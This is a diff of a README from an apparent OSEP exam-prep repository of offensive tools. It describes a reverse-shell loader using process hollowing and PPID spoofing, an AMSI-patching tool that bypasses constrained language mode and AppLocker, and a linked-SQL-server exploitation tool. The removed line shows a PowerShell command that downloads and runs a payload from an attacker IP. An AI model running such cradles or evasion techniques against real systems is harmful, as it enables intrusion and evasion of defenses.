Octoberfest7/OSEP-Tools/README.md

 x64_met_staged_reversetcp_hollow.exe - Command line args: IP PORT PROCESS_TO_HOLLOW(c:\\windows\\system32\\svchost.exe) PPID_SPOOF(explorer)

-bypass-clm.exe - For use with InstallUtil.
+bypass-ps.exe - For use with InstallUtil.
 Contains AMSI binary patch.
-Pass powershell commands with /c= e.g. /c="iex (new-object net.webclient).downloadstring('http://192.168.49.68/payload.txt')"
+Will start an interactive powershell session in FullLanguageMode.

 sql.exe - x64 application for exploitation of linked SQL servers.
 Has functionality for use with InstallUtil AppLocker bypass.